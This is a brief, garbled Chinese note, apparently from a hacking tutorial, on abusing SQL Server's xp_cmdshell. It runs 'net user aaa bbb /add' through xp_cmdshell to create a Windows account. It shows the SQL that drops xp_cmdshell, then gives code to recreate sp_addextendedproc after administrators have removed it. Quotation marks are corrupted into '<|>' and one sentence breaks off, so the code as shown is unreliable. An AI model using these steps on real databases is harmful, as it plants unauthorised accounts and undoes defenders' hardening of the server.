1).XP_CMDSHELL <|>cmd.exe /c net user aaa bbb /add<|> 人人都知道的办法,最大的好处是有回显,但是最怕
if exists (select * from dbo.sysobjects where id = object_id(N<|>[dbo].[xp_cmdshell]<|>) and OBJECTPROPERTY(id, N<|>IsExtendedProc<|>) = 1) exec sp_dropextendedproc N<|>[dbo].[xp_cmdshell]<|> GO
DROP PROCEDURE sp_addextendedproc if exists (select * from dbo.sysobjects where id = object_id(N<|>[dbo].[xp_cmdshell]<|>) and OBJECTPROPERTY(id, N<|>IsExtendedProc<|>) = 1) exec sp_dropextendedproc N<|>[dbo].[xp_cmdshell]<|> GO
还原: create procedure sp_addextendedproc --- 1996/08/30 20:13 @functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as set implicit_transactions off if @@trancount > 0 begin raiserror(15002,-1,-1,<|>sp_addextendedproc<|>) return (1) end /* ** Create the extended procedure mapping. */ dbcc addextendedproc( @functname, @dllname) return (0) -- sp_addextendedproc GO
